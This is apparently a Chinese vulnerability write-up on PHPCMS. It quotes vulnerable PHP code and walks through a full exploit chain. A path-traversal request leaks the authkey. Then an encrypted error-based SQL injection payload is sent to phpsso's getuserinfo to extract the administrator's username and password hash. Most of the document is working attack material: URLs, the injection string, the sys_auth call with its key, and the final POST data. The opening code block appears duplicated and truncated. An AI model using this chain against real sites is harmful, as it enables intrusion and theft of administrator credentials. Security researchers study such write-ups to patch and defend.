<ul><li>/api/get_menu.php</li></ul><pre class="">function ajax_getlist() { $cachefile = $_GET['cachefile']; $cachefile = str_replace(array('/', '//'), '', $cachefile); //$cachefile = preg_replace('/[\x00-\x08\x0B\x0C\x0E-\x1F\x7F]+/S', '', $cachefile); $path = $_GET['path']; $path = str_replace(array('/', '//'), '', $path); //$path = preg_replace('/[\x00-\x08\x0B\x0C\x0E-\x1F\x7F]+/S', '', $path); $title = $_GET['title']; $key = $_GET['key']; $infos = getcache($cachefile,$path); </pre><p>其中getcache中参数可控,可以包含cache文件夹中配置文件得到authkey。利用authkey可以进行SQL注入。</p><ul><li>/phpsso_server/phpcms/modules/phpsso/index.php</li></ul><pre class="">public function getuserinfo($is_return = 0) { $this->uid = isset($this->data['uid']) ? $this->data['uid'] : ''; $this->email = isset($this->data['email']) ? $this->data['email'] : ''; if($this->uid > 0) { $r = $this->db->get_one(array('uid'=>$this->uid)); } elseif(!empty($this->username)) { $r =...
<ul><li>/api/get_menu.php</li></ul><pre class="">function ajax_getlist() { $cachefile = $_GET['cachefile']; $cachefile = str_replace(array('/', '//'), '', $cachefile); //$cachefile = preg_replace('/[\x00-\x08\x0B\x0C\x0E-\x1F\x7F]+/S', '', $cachefile); $path = $_GET['path']; $path = str_replace(array('/', '//'), '', $path); //$path = preg_replace('/[\x00-\x08\x0B\x0C\x0E-\x1F\x7F]+/S', '', $path); $title = $_GET['title']; $key = $_GET['key']; $infos = getcache($cachefile,$path); </pre><p>其中getcache中参数可控,可以包含cache文件夹中配置文件得到authkey。利用authkey可以进行SQL注入。</p><ul><li>/phpsso_server/phpcms/modules/phpsso/index.php</li></ul><pre class="">public function getuserinfo($is_return = 0) { $this->uid = isset($this->data['uid']) ? $this->data['uid'] : ''; $this->email = isset($this->data['email']) ? $this->data['email'] : ''; if($this->uid > 0) { $r = $this->db->get_one(array('uid'=>$this->uid)); } elseif(!empty($this->username)) { $r = $this->db->get_one(array('username'=>$this->username)); } elseif(!empty($this->email)) { $r = $this->db->get_one(array('email'=>$this->email)); } else { return false; } <br></pre><p>将uid直接带入查询,造成SQL注入漏洞。<br></p><p>访问URL地址,获取authkey:</p><pre class="">http://10.211.55.12/phpcms/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin&key=authkey</pre><p><img alt="018DE5AC-D4BB-4E46-8F6B-4B8EBB988FE8.png" src="https://images.seebug.org/@/uploads/1434092973409-018DE5AC-D4BB-4E46-8F6B-4B8EBB988FE8.png" data-image-size="540,122"><br></p><p>利用PHPCMS的内置加密函数sys_auth加密如下内容:</p><pre class="">uid=1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13 and (select 1 from (select count(*),concat((select concat(username,'|',password,0x3a3a,encrypt)from v9_sso_admin limit 1),floor(rand(0)*2))x from information_schema.tables group by x)a)#</pre><p>调用方法为:</p><pre class="">echo sys_auth("uid=1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13 and (select 1 from (select count(*),concat((select concat(username,'|',password,0x3a3a,encrypt)from v9_sso_admin limit 1),floor(rand(0)*2))x from information_schema.tables group by x)a)#'", "ENCODE", "94n16bQt8F0900oowgpQENmCvCd69szh");</pre><p>得到结果为: </p><p><img alt="12E407CE-C671-4B98-A48E-1577290D84A6.png" src="https://images.seebug.org/@/uploads/1434092981692-12E407CE-C671-4B98-A48E-1577290D84A6.png" data-image-size="618,137"><br></p><p>利用Hackbar进行注入,POST内容:</p><pre class="">data=ada8YbYCC4vW3ZUiLq9FHK4AU0W2Nrho-QpN_rBOBhf8MRIqj_GOZS5-EUBX8_oL6QlfTkvv84VuO_ZFa_JlrxiYgxai6qjiikU78vn90aH-jnD4Emx4LYPx2pCiuNB3HKUvKiykjtnZSwlBAlBdpGOTvYnoZOgiXFBcfPCf-ApPYyVlQCSoN0BS04yKgUdU8ijkulguiKwDR1jYzaFA_GLGtV-R1AkEKHNz9ImpH_QwIzAwd4SJdhrPgVej69CS_rLMfYNH7F1f174jzPjunyKfJCEgszsmoHys19fIVMyiABzRU6t_tzTjmX9xGFahK7nnFRx8cdC13aT0nMO9txLCL5f0uTS86kn2CXRa9rN_-8JLTl0hv9dNsNvVGSHk4ndz</pre><p>到:</p><pre class="">http://10.211.55.12/phpcms/phpsso_server/?m=phpsso&c=index&a=getuserinfo&appid=1</pre><p>得到管理员的帐号密码: </p><p><img alt="4E4D4418-1F91-496D-BEDD-28435BA0B581.png" src="https://images.seebug.org/@/uploads/1434092991355-4E4D4418-1F91-496D-BEDD-28435BA0B581.png" data-image-size="627,212"><br></p>
